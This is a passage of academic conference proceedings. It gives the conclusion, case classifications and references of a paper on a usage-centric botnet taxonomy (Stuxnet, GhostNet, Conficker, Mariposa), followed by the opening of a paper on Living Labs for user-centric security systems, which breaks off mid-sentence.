of the owner. Malware developers are actively develop<strong>in</strong>g and look<strong>in</strong>g for new exploits to <strong>in</strong>fect new<br />
hosts, and so far they are quite successful (Kle<strong>in</strong> et al. 2011)<br />
Voluntary Self-<strong>in</strong>fection:<br />
Besides the mentioned common way of <strong>in</strong>fection, there have been a number of cases when owners voluntarily<br />
<strong>in</strong>fected their mach<strong>in</strong>es to jo<strong>in</strong> a botnet. By do<strong>in</strong>g that they supported a certa<strong>in</strong> (politically motivated)<br />
cause, e.g. <strong>in</strong>cidents <strong>in</strong> Estonia 2007 and Operation Payback 2010 (Ottis 2008; Panda <strong>Security</strong><br />
2010).<br />
4. Application of the taxonomy<br />
In order to test how well the taxonomy classifies events of botnet usage, we look at a selection of recent<br />
<strong>in</strong>cidents <strong>in</strong>volv<strong>in</strong>g botnets. These events are chosen to represent a wide variety of botnet uses; their or-<br />
69
Christian Czosseck and Karlis Pod<strong>in</strong>s<br />
der does not reflect any sort order of importance. In some cases, several closely-related <strong>in</strong>cidents are<br />
classified together as a group, because different events us<strong>in</strong>g the same bots happened at the same time.<br />
An overview is presented <strong>in</strong> Table 1.<br />
4.1 Stuxnet<br />
Although the number of Stuxnet <strong>in</strong>fected hosts was small and spread<strong>in</strong>g was highly targeted, the most<br />
basic features of botnets be<strong>in</strong>g the existence of a command and control capability support to consider<br />
Stuxnet as a botnet. (Falliere et al. 2010)<br />
While categoriz<strong>in</strong>g this <strong>in</strong>cident us<strong>in</strong>g the proposed taxonomy, the lack of trustworthy, full <strong>in</strong>formation left<br />
the attribute of Users of Botnets hard to decide. While there are many speculations on this, we decided to<br />
assume at least one state actor be<strong>in</strong>g <strong>in</strong>volved. The Motivation is covered by the power projection taxon<br />
<strong>in</strong>clud<strong>in</strong>g sabotage, which seems to be the most likely motivation beh<strong>in</strong>d this <strong>in</strong>cident. Stuxnet spread by<br />
<strong>in</strong>voluntary <strong>in</strong>fection, and its manipulation and damag<strong>in</strong>g <strong>in</strong>dustrial systems represents a denial of service<br />
functionality.<br />
4.2 GhostNet<br />
There is no evidence on who are the players beh<strong>in</strong>d GhostNet. Speculations reach from (groups of) <strong>in</strong>dividuals<br />
up to state actors. As such we leave the user as unknown. But the small number of <strong>in</strong>fected hosts<br />
(around 1300) and percentage of high-value targets (up to 30% of <strong>in</strong>fected hosts belonged to m<strong>in</strong>istries of<br />
foreign affairs, embassies, <strong>in</strong>ternational organizations etc.) <strong>in</strong>dicate that the motivation was espionage<br />
aga<strong>in</strong>st pro-Tibet community. In order to do that, GhostNet was perform<strong>in</strong>g <strong>in</strong>formation theft from <strong>in</strong>voluntary<br />
<strong>in</strong>fected mach<strong>in</strong>es. (Deibert et al. 2009)<br />
4.3 Operation payback<br />
The Operation Payback was launched by a group of WikiLeaks supporters, after multiple f<strong>in</strong>ancial service<br />
providers stopped their services for WikiLeaks after the latest, massive disclosure of classified US documents.<br />
The attacks were carried out by us<strong>in</strong>g an open source network attack application called Low Orbit Ion<br />
Cannon. The attacks were coord<strong>in</strong>ated by us<strong>in</strong>g <strong>in</strong>ternet forums, Twitter and some C&C servers (Pras et<br />
al. 2010; Panda <strong>Security</strong> 2010; Correll 2010). Accord<strong>in</strong>g to our taxonomy, we classify the motivation as<br />
project<strong>in</strong>g power. The functionality of choice was DDoS attacks and the participation <strong>in</strong> this event was<br />
voluntarily.<br />
4.4 Help-Israel-W<strong>in</strong><br />
A group of pro-Israel activists, <strong>in</strong> their campaign aga<strong>in</strong>st Hamas (power projection) set up a website also<br />
host<strong>in</strong>g software for download, to voluntarily jo<strong>in</strong> a botnet under the control of this group. Based on the<br />
<strong>in</strong>formation released by this group, they use the botnet to conduct DDoS attacks aga<strong>in</strong>st pro-Palest<strong>in</strong>ian<br />
web sites. To which extend they were successful, or if they have launched any attacks at all is still unclear.<br />
(Shachtman 2009)<br />
4.5 Conficker<br />
Till now it is publicly not known, who the developers and users of Conficker are. But the analysis of this<br />
malware and the speed with which this botnet adapted to counter measures lets us assume, that at least<br />
a group of persons is beh<strong>in</strong>d Conficker. The lack of any executed functionality beside file transfer to update<br />
the <strong>in</strong>fected clients with last versions of Conficker allows the assumption that Conficker was ma<strong>in</strong>ly<br />
developed as a proof-of-concept and as such falls under Education&Research. Conficker <strong>in</strong>fected its host<br />
<strong>in</strong>voluntary. (Porras et al. 2009)<br />
4.6 Mariposa<br />
The Mariposa botnet, claimed to be one of the world’s largest botnets ever, was developed and used by<br />
an <strong>in</strong>ternational group of crim<strong>in</strong>als for f<strong>in</strong>ancial ga<strong>in</strong>. They harvested bank<strong>in</strong>g credentials and credit card<br />
data (<strong>in</strong>formation theft) as well as used it for launch<strong>in</strong>g DDoS attacks. The victims were all <strong>in</strong>fected <strong>in</strong>voluntarily<br />
(McMillan 2010).<br />
70
4.7 Belarus censorship<br />
Christian Czosseck and Karlis Pod<strong>in</strong>s<br />
The Belarus state has a longer history of enforc<strong>in</strong>g Internet censorship on its citizens with regards to regime-critical<br />
<strong>in</strong>formation. Chapter ’97, a lead<strong>in</strong>g venue for public discussions <strong>in</strong> Belarus, suffered regularly<br />
under state sponsored cyber attacks aga<strong>in</strong>st their website. In April, 2008 DDoS attack took them<br />
down to block state-<strong>in</strong>dependent news coverage of protest ongo<strong>in</strong>g <strong>in</strong> the streets (manipulation by filter<strong>in</strong>g<br />
data).<br />
While Belarus officials denied official <strong>in</strong>volvement, it is assumed that they were not actively counter<strong>in</strong>g the<br />
attacks. As such we classify this <strong>in</strong>cident as done by a state actor. As the used botnets are unknown, the<br />
<strong>in</strong>fection way cannot be decided upon. (Pavlyuchenko 2009)<br />
Table 1: Overview of selected <strong>in</strong>cidents and their classification<br />
Example<br />
User Motivation Functionality Way of <strong>in</strong>fection<br />
Stuxnet State Actor Power Projection Denial of Service Involuntary<br />
GhostNet Unknown Espionage Information theft Involuntary<br />
Operation Payback Group Power projection DDoS Voluntary<br />
Israeli Group Power Projection DDoS Voluntary<br />
Conficker Group Education&Research none Involuntary<br />
Mariposa Group F<strong>in</strong>ancial Ga<strong>in</strong> Information Theft/<br />
DDoS<br />
Involuntary<br />
5. Conclusions<br />
Easy access to botnets makes them available to all k<strong>in</strong>d of parties, not all of them particularly <strong>in</strong>terested<br />
<strong>in</strong> monetary revenue, but <strong>in</strong>creas<strong>in</strong>gly pursu<strong>in</strong>g political and military aims. With this the common <strong>in</strong>terpretation<br />
of monetary motivated cyber crime be<strong>in</strong>g the ma<strong>in</strong> driver beh<strong>in</strong>d the usage of botnet does not sufficiently<br />
cover the current situation anymore.<br />
We have presented a usage-centric taxonomy, which provides a structured approach to compare different<br />
botnet <strong>in</strong>cidents.<br />
Two dist<strong>in</strong>ct applications of the proposed taxonomy were considered; firstly to analyze and categorize<br />
past and current botnet <strong>in</strong>cidents. The applicability of the taxonomy has been shown on a selection of<br />
recent botnet <strong>in</strong>cidents. The performance of the usage-centric taxonomy <strong>in</strong> classify<strong>in</strong>g the selected <strong>in</strong>cidents<br />
gives hopes that the proposed taxonomy will be helpful <strong>in</strong> understand<strong>in</strong>g other botnet <strong>in</strong>cidents.<br />
This might motivate to structure countermeasures <strong>in</strong> a similar way and develop<strong>in</strong>g an <strong>in</strong>strument to organize<br />
and select responses on different levels.<br />
Another application is to help th<strong>in</strong>k<strong>in</strong>g about novel ways of us<strong>in</strong>g botnets. By pre-select<strong>in</strong>g some attributes,<br />
the taxonomy allows for structured and systematic search thru the rema<strong>in</strong><strong>in</strong>g attributes. By this, the<br />
taxonomy might f<strong>in</strong>d <strong>in</strong>terest<strong>in</strong>g and novel botnet-related threats and lead to improvements of exist<strong>in</strong>g or<br />
forthcom<strong>in</strong>g risk assessments and as such helps to improve cyber security on <strong>in</strong>stitutional down up to<br />
national level.<br />
This taxonomy was designed def<strong>in</strong><strong>in</strong>g generic taxon, able to be matched even future <strong>in</strong>cidents and is believed<br />
to cover most seen so far. Nevertheless the future might show the need to amend the list of taxa,<br />
especially the one of Functionalities applied.<br />
Disclaimer<br />
The op<strong>in</strong>ions expressed here are those of the authors and should not be considered as the official policy<br />
of the Cooperative Cyber Defence Centre of Excellence or NATO.<br />
References<br />
AnonOps, 2010. Welcome to AnonOps Network | Anonymous Operations (AnonOps), HACKERS ON STEROIDS.<br />
Available at: http://www.anonops.ru/ [Accessed February 9, 2011].<br />
Asosheh, A. & Ramezani, N., 2008. A comprehensive taxonomy of DDoS attacks and defense mechanism apply<strong>in</strong>g<br />
<strong>in</strong> a smart classification. WSEAS Transactions on Communications, 7(4), pp.281-290.<br />
Bacher, P. et al., 2005. Know your enemy: Track<strong>in</strong>g botnets. The Honeynet Project.<br />
Barford, P. & Yegneswaran, V., 2007. An <strong>in</strong>side look at botnets. Malware Detection.<br />
71
Christian Czosseck and Karlis Pod<strong>in</strong>s<br />
Champagne, D. & Lee, R., 2006. Scope of DDoS countermeasures: taxonomy of proposed solutions and design<br />
goals for real-world deployment. on Systems and Information <strong>Security</strong> (SSI).<br />
Correll, S.-P., 2010. ’Tis the Season of DDoS – WikiLeaks Edition | PandaLabs Blog. Pandalabs. Available at:<br />
http://pandalabs.pandasecurity.com/tis-the-season-of-ddos-wikileaks-editio/ [Accessed February 9, 2011].<br />
Deibert, R. et al., 2009. Track<strong>in</strong>g GhostNet: Investigat<strong>in</strong>g a Cyber Espionage Network. Information Warfare Monitor,<br />
Munk Centre, JR02-2009, March, 29.<br />
Denn<strong>in</strong>g, D.E., 2001. Activism, hacktivism, and cyberterrorism: the <strong>in</strong>ternet as a tool for <strong>in</strong>fluenc<strong>in</strong>g foreign policy.<br />
Networks and netwars: The future of terror, crime, and militancy, p.239–288.<br />
Falliere, N., Murchu, L.O. & Chien, E., 2010. W32. Stuxnet Dossier. Symantec <strong>Security</strong> Response, 3(November),<br />
pp.1-64.<br />
Hansman, S. & Hunt, R., 2005. A taxonomy of network and computer attacks. Computers & <strong>Security</strong>, 24(1), pp.31-<br />
43.<br />
Holz, T. et al., 2008. Measur<strong>in</strong>g and detect<strong>in</strong>g fast-flux service networks. In Symposium on Network and Distributed<br />
System <strong>Security</strong>. Citeseer.<br />
Husted, N. & Myers, S., 2010. Mobile location track<strong>in</strong>g <strong>in</strong> metro areas: malnets and others. In Proceed<strong>in</strong>gs of the<br />
17th ACM conference on Computer and communications security. ACM, p. 85–96.<br />
Killourhy, K.S., Maxion, R. a & Tan, K.M.C., 2004. A defense-centric taxonomy based on attack manifestations,<br />
IEEE.<br />
Kle<strong>in</strong>, G., Leder, F. & Czosseck, C., 2011. On the Arms Race Around Botnets - Sett<strong>in</strong>g Up and Tak<strong>in</strong>g Down Botnets.<br />
In C. Czosseck & K. Pod<strong>in</strong>s, eds. 2011 3rd International Conference on Cyber Conflicts. Tall<strong>in</strong>n: CCD COE<br />
Publications (<strong>in</strong> press).<br />
Lemay, A., Fernandeza, J.M. & Knight, S., 2010. P<strong>in</strong>prick attacks, a lesser <strong>in</strong>cluded case? In C. Czosseck & K. Pod<strong>in</strong>s,<br />
eds. Conference on Cyber Conflict Proceed<strong>in</strong>gs. Tall<strong>in</strong>n: CCD COE Publications, pp. 183 - 194.<br />
Lippmann, R.P. et al., 1998. Evaluat<strong>in</strong>g <strong>in</strong>trusion detection systems: the 1998 DARPA off-l<strong>in</strong>e <strong>in</strong>trusion detection<br />
evaluation. Proceed<strong>in</strong>gs DARPA Information Survivability Conference and Exposition. DISCEX 00, pp.12-26.<br />
McMillan, R., 2010. Spanish police take down massive mariposa botnet. IDG News. Available at:<br />
http://www.pcworld.com/bus<strong>in</strong>esscenter/article/190634/spanish_police_take_down_massive_mariposa_botnet.h<br />
tml [Accessed February 9, 2011].<br />
Mills, E., 2009. “Golden Cash” network - rent a botnet - ZDNet. CNET News. Available at:<br />
http://www.zdnet.com/news/golden-cash-network-rent-a-botnet/312957 [Accessed February 9, 2011].<br />
Mirkovic, J. & Reiher, P., 2004. A taxonomy of DDoS attack and DDoS defense mechanisms. ACM SIGCOMM Computer<br />
Communication Review, 34(2), p.39.<br />
Nazario, J., 2009. Politically Motivated Denial of Service Attacks. In C. Czosseck & K. Geers, eds. The Virtual Battlefield:<br />
Perspectives on Cyber Warfare. Amsterdam: IOS Press, p. 2010–05.<br />
Nazario, Jose & Holz, T., 2008. As the net churns: Fast-flux botnet observations. In Malicious and Unwanted Software,<br />
2008. MALWARE 2008. 3rd International Conference on. IEEE, p. 24–31.<br />
Ottis, R., 2008. Analysis of the 2007 Cyber Attacks Aga<strong>in</strong>st Estonia from the Information Warfare Perspective. In<br />
Proceed<strong>in</strong>gs of the 7th European Conference on Information Warfare. <strong>Academic</strong> <strong>Conferences</strong> <strong>Limited</strong>, p. 163.<br />
Panda <strong>Security</strong>, 2010. The Anonymous cyber-activist group, responsible for the attack on Spa<strong>in</strong>’s SGAE and other<br />
copyright societies, launches further attacks <strong>in</strong> defense of Wikileaks founder | Press Panda <strong>Security</strong>. Panda <strong>Security</strong>.<br />
Available at: http://press.pandasecurity.com/news/the-anonymous-cyber-activist-group-responsible-forthe-attack-on-spa<strong>in</strong>’s-sgae-and-other-copyright-societies-launches-further-attacks-<strong>in</strong>-defense-of-wikileaksfounder/<br />
[Accessed February 9, 2011].<br />
Pavlyuchenko, F., 2009. Belarus <strong>in</strong> the Context of European Cyber <strong>Security</strong>. In C. Czosseck & K. Geers, eds. The<br />
Virtual Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press.<br />
Porras, P., Saidi, H. & V<strong>in</strong>od, Y., 2009. An Analysis of Conficker,<br />
Pras, A. et al., 2010. Attacks by “ Anonymous ” WikiLeaks Proponents not Anonymous,<br />
Schwartz, M.J., 2010. Pssst...Want To Rent A Botnet? - Darkread<strong>in</strong>g. Dark Read<strong>in</strong>g. Available at:<br />
http://www.darkread<strong>in</strong>g.com/security/vulnerabilities/225200525/<strong>in</strong>dex.html [Accessed February 9, 2011].<br />
Shachtman, N., 2009. Wage cyberwar aga<strong>in</strong>st hamas, surrender your pc. Wired. Available at:<br />
http://www.wired.com/dangerroom/2009/01/israel-dns-hack/ [Accessed February 11, 2011].<br />
Sophos, 2006. Onl<strong>in</strong>e Russian blackmail gang jailed for extort<strong>in</strong>g $4m from gambl<strong>in</strong>g websites. Sophos.com. Available<br />
at: http://www.sophos.com/pressoffice/news/articles/2006/10/extort-ddos-blackmail.html [Accessed February<br />
9, 2011].<br />
Temm<strong>in</strong>gh, R. & Geers, K., 2009a. Virtual Plots, Real Revolution. In C Czosseck & K Geers, eds. The Virtual Battlefield:<br />
Perspectives on Cyber Warfare. IOS Press, pp. 294-302.<br />
Temm<strong>in</strong>gh, R. & Geers, Kenneth, 2009b. Virtual Plots, Real Revolution. In Christian Czosseck & Kenneth Geers,<br />
eds. The Virtual Battlefield: Perspectives on Cyber Warfare. Amsterdam: IOS Press, pp. 294-302.<br />
Weaver, N. et al., 2003. A taxonomy of computer worms. In Proceed<strong>in</strong>gs of the 2003 ACM workshop on Rapid Malcode.<br />
ACM, p. 11–18.<br />
Wood, A. & Stankovic, J., 2004. A taxonomy for denial-of-service attacks <strong>in</strong> wireless sensor networks. of Sensor<br />
Networks: Compact Wireless and.<br />
Wun, A., Cheung, A. & Jacobsen, H.-A., 2007. A taxonomy for denial of service attacks <strong>in</strong> content-based publish/subscribe<br />
systems, New York, New York, USA: ACM Press.<br />
72
User-Centric Information <strong>Security</strong> Systems - A Liv<strong>in</strong>g lab<br />
Approach<br />
Moses Dlam<strong>in</strong>i 1, 2 , Jan Eloff1, 2 , Marek Ziel<strong>in</strong>ksi 1,2 , Jason Chuang 1 and Danie Smit 1<br />
1<br />
SAP Research/Meraka UTD, Pretoria, South Africa<br />
2<br />
University of Pretoria, South Africa<br />
moses.dlam<strong>in</strong>i@sap.com<br />
jan.eloff@sap.com<br />
marek.ziel<strong>in</strong>ski@sap.com<br />
jason.chuang@sap.com<br />
danie.smit@sap.com<br />
Abstract: For the past forty years, security experts have spent billions of dollars try<strong>in</strong>g to improve security<br />
technologies. However, security systems are cont<strong>in</strong>ually fail<strong>in</strong>g to protect end users’ <strong>in</strong>formation systems and their<br />
<strong>in</strong>formation. <strong>Security</strong> experts claim that the end users are the weakest l<strong>in</strong>k <strong>in</strong> the security cha<strong>in</strong>, and the end users<br />
claim that security features of systems are complex and full of gap<strong>in</strong>g security vulnerabilities and they are an<br />
overhead that h<strong>in</strong>ders their work. There is clearly a disjo<strong>in</strong>t here. This paper <strong>in</strong>troduces the concept of a Liv<strong>in</strong>g Lab to<br />
help improve the current status and provide user-centric security systems.<br />
Keywords: <strong>in</strong>formation security system, liv<strong>in</strong>g lab, user-centric security<br />
1. Introduction<br />
All along <strong>in</strong>formation security experts have spent billions of dollars do<strong>in</strong>g their best to strengthen security<br />
tools and technologies. This is reflected <strong>in</strong> the recent advances <strong>in</strong> access control policies, quantum<br />
cryptography, state of the art host-based and perimeter firewalls, 360-degree anti-viruses, anti-spyware,<br />
spam filters, real-time <strong>in</strong>trusion detection and prevention systems, multi-factor authentication, and other<br />
<strong>in</strong>formation security controls. However, the problem of <strong>in</strong>formation <strong>in</strong>security still persist and with<br />
<strong>in</strong>creas<strong>in</strong>g consequences. Even with the high regulatory compliance penalties for breached<br />
organisations, <strong>in</strong>formation security mechanisms still fail to protect the end user <strong>in</strong>formation systems and<br />
the <strong>in</strong>formation they hold. This is an <strong>in</strong>dication that a technological focus alone cannot solve the problems<br />
of <strong>in</strong>formation <strong>in</strong>security (Miller 2010 and Dlam<strong>in</strong>i 2010).<br />
Hav<strong>in</strong>g done their level best <strong>in</strong> strengthen<strong>in</strong>g the technologies, security experts are now po<strong>in</strong>t<strong>in</strong>g f<strong>in</strong>gers<br />
at the end users claim<strong>in</strong>g they are “<strong>in</strong>herently <strong>in</strong>secure” (Sasse, Brostoff & Weirich 2001). End users are<br />
<strong>in</strong>capable of us<strong>in</strong>g security tools and they have unacceptably slow speed and accuracy when deal<strong>in</strong>g with<br />
security operations (Smith 2003). Hence, end users are now commonly referred to as the “weakest l<strong>in</strong>k <strong>in</strong><br />
the <strong>in</strong>formation security cha<strong>in</strong>” (Izadi et al. 2009; Asher Aumasson & Phan 2009; Patrick, Long & Fl<strong>in</strong>n<br />
2003; Sasse et al. 2001 and Schneier 2000). From the security experts’ po<strong>in</strong>t of view, the <strong>in</strong>security<br />
problems start from the end users’ <strong>in</strong>teraction with the security systems.<br />
In defence to these assertions, usability experts argue that the end users are not the enemy <strong>in</strong> the<br />
security cha<strong>in</strong> (Adams and Sasse 1999). Smith (2003) argues that the IT <strong>in</strong>frastructure is cont<strong>in</strong>ually full<br />
of gap<strong>in</strong>g security holes and vulnerabilities. It becomes only a matter of time before the attackers could<br />
f<strong>in</strong>d and exploit these holes and vulnerabilities and quite often, they are the first ones to notice these<br />
vulnerabilities. In essence, security breaches are <strong>in</strong>evitable given the current security mechanisms.<br />
Furthermore, Balfanz et al. (2004) argue that end users struggle to understand <strong>in</strong>formation security<br />
systems because they are complex. With the complexity of the systems, end users end up<br />
misunderstand<strong>in</strong>g the security implications of their actions. Hence, they quite often misconfigure, disable,<br />
circumvent or completely ignore security systems to get their work done. This is why <strong>in</strong>formation security<br />
systems are normally seen a necessary evil or overhead that h<strong>in</strong>ders productivity (Dlam<strong>in</strong>i, Eloff & Eloff<br />
2009 and Adams & Sasse 1999).<br />
1.1 Problem statement<br />
<strong>Security</strong> experts cont<strong>in</strong>ue to design and develop security systems <strong>in</strong> closed laboratories follow<strong>in</strong>g a threat<br />
model. With the “claim” of understand<strong>in</strong>g the chang<strong>in</strong>g security threat landscape us<strong>in</strong>g the threat model,<br />
security experts design and develop new systems to counter new security threats. These systems are<br />
73
Moses Dlam<strong>in</strong>i et al.<br />
then tested <strong>in</strong> the artificial laboratories and after pass<strong>in</strong>g the tests, they get pushed to the end users (i.e.<br />
technology dump<strong>in</strong>g) with the hope that they will work as <strong>in</strong>tended.<br />
Although, these systems might work well <strong>in</strong> the laboratories, quite often they fail or become less effective<br />
<strong>in</strong> the real-world. This is ma<strong>in</strong>ly because the traditional technology-centric way of develop<strong>in</strong>g systems is<br />
more concerned with the functional features of the systems. It does not take <strong>in</strong>to consideration the end<br />
user requirements, problems and environment, yet this is crucial if such systems are meant to protect the<br />
end users. This approach renders most of the exist<strong>in</strong>g security systems <strong>in</strong>appropriate for the end users.<br />
Faced with the problem of <strong>in</strong>appropriate systems, end users spend a lot of time and money customiz<strong>in</strong>g<br />
and tailor<strong>in</strong>g the systems to better address their specific needs. Hence, there exists a surg<strong>in</strong>g need to<br />
understand the end users’ requirements, needs, cultural diversity, economic and social issues, and the<br />
environment they operate <strong>in</strong>. These must then be <strong>in</strong>corporated <strong>in</strong> the design and development of usercentric<br />
<strong>in</strong>formation security systems. The end users must be actively <strong>in</strong>volved at all stages of the<br />
development.<br />
This paper is aimed at answer<strong>in</strong>g the question on how we can <strong>in</strong>corporate and actively engage end users<br />
<strong>in</strong> the design and development of <strong>in</strong>formation security systems. This paper proposes the use of a Liv<strong>in</strong>g<br />
Lab (LL) concept. This approach can help security experts to actively engage with end users early<br />
enough to deliver user-centric systems that are driven by and best meet the user requirements.<br />
The structure of the paper rest of the paper is as follows: Section 2 def<strong>in</strong>es the concept of a LL. Section 3<br />
presents related work. Section 4 is a discussion on how we used the Overture LL to achieve a usercentric<br />
<strong>in</strong>formation security system. Section 5 concludes the paper and highlights the future direction of<br />
this research.<br />
2. Def<strong>in</strong>ition of a liv<strong>in</strong>g lab<br />
There are a number of def<strong>in</strong>itions <strong>in</strong> literature that attempts to def<strong>in</strong>e a Liv<strong>in</strong>g Lab (LL). However, there is<br />
still no widely accepted standard def<strong>in</strong>ition. A move towards an accepted standard def<strong>in</strong>ition requires a<br />
study of the already available def<strong>in</strong>itions. It is for this reason that we outl<strong>in</strong>e some of the def<strong>in</strong>itions <strong>in</strong> an<br />
effort to try and f<strong>in</strong>d a possible common ground for all. Below, we discuss some of the def<strong>in</strong>itions and<br />
later <strong>in</strong>tegrate them. This is a move towards a standardized def<strong>in</strong>ition.<br />
A liv<strong>in</strong>g lab is def<strong>in</strong>ed as a user-driven open design ecosystem <strong>in</strong> real-life sett<strong>in</strong>gs which is based on a<br />
bus<strong>in</strong>ess (Private)-citizens (Public)-government partnership that enables and empowers end users to<br />
take an active role <strong>in</strong> a fully <strong>in</strong>tegrated co-<strong>in</strong>novative design and development of systems (Santoro &<br />
Conte, 2009). This is achieved by br<strong>in</strong>g<strong>in</strong>g end users early <strong>in</strong>to the development process to identify new<br />
and emerg<strong>in</strong>g user patterns and behaviour. Santoro and Conte (2009) argue that this also bridges the<br />
gap between technology development and its uptake by all the stakeholders of the value cha<strong>in</strong>. It also<br />
allows for early assessment of the socio-economic implications of the new technology by demonstrat<strong>in</strong>g<br />
the validity of its <strong>in</strong>novation.<br />
Schumacher (2008) def<strong>in</strong>es a LL as a collaboration of Public-Private-Civic-Partnership <strong>in</strong> which all<br />
stakeholders (i.e. <strong>in</strong>clud<strong>in</strong>g end users) co-design and co-create new products, services and technologies<br />
<strong>in</strong> real life environments. This means that end users and all stakeholders work together and each one of<br />
them take an active role <strong>in</strong> creat<strong>in</strong>g new systems <strong>in</strong> a live or virtual environment.<br />
Van der Walt et al. (2009) def<strong>in</strong>es a LL as a new way for end users to actively take part <strong>in</strong> a real-time<br />
experimental environment and, together with system developers, learn to create community-driven<br />
<strong>in</strong>novative solutions that best meet the users’ pa<strong>in</strong>-po<strong>in</strong>ts and solve current and real world problems <strong>in</strong> a<br />
unique way. In this def<strong>in</strong>ition, a LL provides users with a real time platform to experiment with solutions <strong>in</strong><br />
an effort to tailor them to their specific needs. The work of van der Walt et al. (2009) cites a number of<br />
def<strong>in</strong>itions from other researchers. The one that appears most comprehensive there<strong>in</strong> def<strong>in</strong>es a LL as<br />
neither a traditional research lab nor a testbed, but as an <strong>in</strong>novative platform that br<strong>in</strong>gs together and<br />
engages all stakeholders at the early stage of the <strong>in</strong>novation process to experiment breakthrough<br />
concepts and potential value for both society and end users that will lead to breakthrough <strong>in</strong>novations<br />
(van der Walt et al. 2009).<br />
Folstad (2008) def<strong>in</strong>es a LL as an environment for engag<strong>in</strong>g end users <strong>in</strong> the <strong>in</strong>novation and<br />
development process as a way of meet<strong>in</strong>g the ICT <strong>in</strong>novation challenges. This def<strong>in</strong>ition does not<br />
mention anyth<strong>in</strong>g about the type of environment i.e. test<strong>in</strong>g or experimental platform.<br />
74
Moses Dlam<strong>in</strong>i et al.<br />
From the above def<strong>in</strong>itions we deduce that a LL is characterised by:<br />
User-centric co-design and co-development<br />
Active end user <strong>in</strong>volvement<br />
Development <strong>in</strong> a real-life sett<strong>in</strong>g<br />
End user <strong>in</strong>novation is the driv<strong>in</strong>g force<br />
Capture the exact user needs and context<br />
Involves users as early as conceptualization until deployment<br />
Add value to the end users and society at large.<br />
For the purposes of this paper, a Liv<strong>in</strong>g lab is def<strong>in</strong>ed as user-centric co-design and co-development <strong>in</strong> a<br />
real-life environment stimulated by open co-<strong>in</strong>novation which is achieved through the participation of a<br />
multi-stakeholder Public-Private-Civic partnership that place the end users at the centre and considers<br />
them as active role players from the early stages of conceptualization upto deployment <strong>in</strong> an effort to<br />
develop <strong>in</strong>novative end user-driven solutions that seek to add value to the end users and society at large.<br />
This def<strong>in</strong>ition highlights the ris<strong>in</strong>g power of end users and the rapidly <strong>in</strong>creas<strong>in</strong>g pace of security product<br />
<strong>in</strong>novation that targets specific end user pa<strong>in</strong> po<strong>in</strong>ts to build customer loyalty, facilitate entry <strong>in</strong>to new<br />
market segments and <strong>in</strong>crease customer satisfaction (S<strong>in</strong>ha & Sprague 2008). The <strong>in</strong>creas<strong>in</strong>g end user<br />
security demands, aided by the <strong>in</strong>tensify<strong>in</strong>g bus<strong>in</strong>ess competition, have forced security vendors to ga<strong>in</strong> a<br />
deep understand<strong>in</strong>g of the end users’ needs and to develop an <strong>in</strong>timate relationship with them (S<strong>in</strong>ha &<br />
Sprague 2008). In today’s bus<strong>in</strong>ess environment, only the security products that meet and exceed end<br />
user’ expectations will thrive. Below, we discuss briefly some of the related work that has led to the<br />
current state of affairs.<br />
3. Related work<br />
The relationship between end users and security experts is fail<strong>in</strong>g. This is because end users do not<br />
understand security systems and they perceive them as laborious and unnecessary overheads. <strong>Security</strong><br />
experts, on the other hand, do not understand the end users’ needs and environment. To bridge the gap<br />
and help facilitate a good relationship between end users and security system designers, several<br />
researchers have conducted and explored work on Usable <strong>Security</strong> (Adams & Sasse 1999; Balfanz et al.<br />
2004 and Payne & Edwards 2008) and Use-centric <strong>Security</strong> (Zurko & Simon 1997; Holstrom 1999; Zurko<br />
2005; Nohlberg & Bäckström 2007; Vidyaraman 2008; Jaferian et al. 2009 and Faily & Flechais 2010)<br />
among others.<br />
3.1 Usable security<br />
<strong>Security</strong> experts have jo<strong>in</strong>ed hands with usability experts to establish usable security. This was after<br />
security and usability were considered a trade-off, mean<strong>in</strong>g that to get more of one, you would have to<br />
sacrifice on the other. Usable security strives to f<strong>in</strong>d the right balance between security and usability<br />
without really compromis<strong>in</strong>g on any (Braz, Seffah & M’Raihi 2007; Ben-Asher et al. 2009; Ben-Asher et<br />
al. 2010 and Emil 2010). This approach has resulted <strong>in</strong> easy to use security systems. However, a need<br />
still exists to go a step further to design systems that address end user needs and understand the context<br />
with<strong>in</strong> which they operate. This has lead to research on user-centred security which we discuss below.<br />
3.2 User-centric security<br />
Even though usable security addresses the issue of ease-of-use, a need still exists for researchers to<br />
solve the issue of security systems that goes further to address specific end user pa<strong>in</strong> po<strong>in</strong>ts. This<br />
change has brought about the concept of user-centred security (Zurko 2005; Jaferian et al. 2009 and<br />
Faily & Flechais 2010) a trend that has <strong>in</strong>creased with the proliferation of security products on the<br />
security markets. It has not been clear how to achieve user-centred security, and this has led to our<br />
proposal to use a Liv<strong>in</strong>g Lab approach (LL), which we discuss below.<br />
3.3 Liv<strong>in</strong>g lab<br />
Folstad (2008) argues that the concept of Liv<strong>in</strong>g labs started <strong>in</strong> the n<strong>in</strong>eties. Back then, it described the<br />
cooperative partnership and live field trails (Folstad 2008). The concept of LLs is relatively new <strong>in</strong> the ICT<br />
doma<strong>in</strong>. However, today there is a grow<strong>in</strong>g <strong>in</strong>terest <strong>in</strong> LLs. This <strong>in</strong>terest is reflected <strong>in</strong> the European<br />
75
Moses Dlam<strong>in</strong>i et al.<br />
Network of Liv<strong>in</strong>g Labs (ENoLL) which comprises of 129 LLs (Schaffers et al. 2009). This is the biggest<br />
network of LLs <strong>in</strong> the world that cont<strong>in</strong>ues to grow. However, accord<strong>in</strong>g to the authors, none of these<br />
<strong>in</strong>itiatives have tried to apply LLs on improv<strong>in</strong>g security systems.<br />
3.4 Beyond the current state of affairs<br />
The current user-centric approach has only focused on <strong>in</strong>corporat<strong>in</strong>g user requirements <strong>in</strong> the<br />
development lifecycle of security systems without really engag<strong>in</strong>g the end users as active stakeholders. It<br />
is therefore crucial that security experts engage end users as active role players <strong>in</strong> the development of<br />
<strong>in</strong>novative <strong>in</strong>formation security systems from conceptualization up to deployment. This is important to<br />
achieve what Rahaman and Sasse (2010) call the concept of a “lived experience”. They def<strong>in</strong>e this as a<br />
deep understand<strong>in</strong>g of the relationship between end users and technology <strong>in</strong> terms of their actions and<br />
how they <strong>in</strong>teract. This concept <strong>in</strong>creases the scope of user-centred security beyond the traditional<br />
usability concept of ease-to-use (Rahaman & Sasse 2010). There<strong>in</strong>, it is argued that there is a big risk<br />
that terms such as “usable” and “user-centric” security rema<strong>in</strong> a statement of <strong>in</strong>tent and might never<br />
come to be<strong>in</strong>g fulfilled (Rahaman & Sasse 2010). This is because, most of the time, the context of the<br />
end users and the impact of security systems on their “lived experience” are not be<strong>in</strong>g considered. To<br />
